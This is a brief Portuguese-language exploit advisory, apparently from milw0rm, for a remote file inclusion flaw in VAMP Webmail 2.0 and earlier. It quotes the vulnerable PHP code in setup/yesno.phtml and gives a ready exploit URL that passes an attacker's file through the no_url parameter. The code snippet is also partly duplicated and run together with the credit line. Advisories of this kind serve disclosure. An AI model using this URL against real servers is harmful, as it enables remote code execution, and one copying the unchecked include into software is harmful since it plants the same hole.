Script: VAMP Webmail 2.0 e anteriores
Download: não disponível
Código vulnerável (/setup/yesno.phtml):
include $yes_url;
} else {
include $no_url;
}?>
Desoberta por: Drago84} else {
include $no_url;
}?>
Exploit:
http://host/setup/yesno.phtml?no_url=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txtFonte: milw0rm.com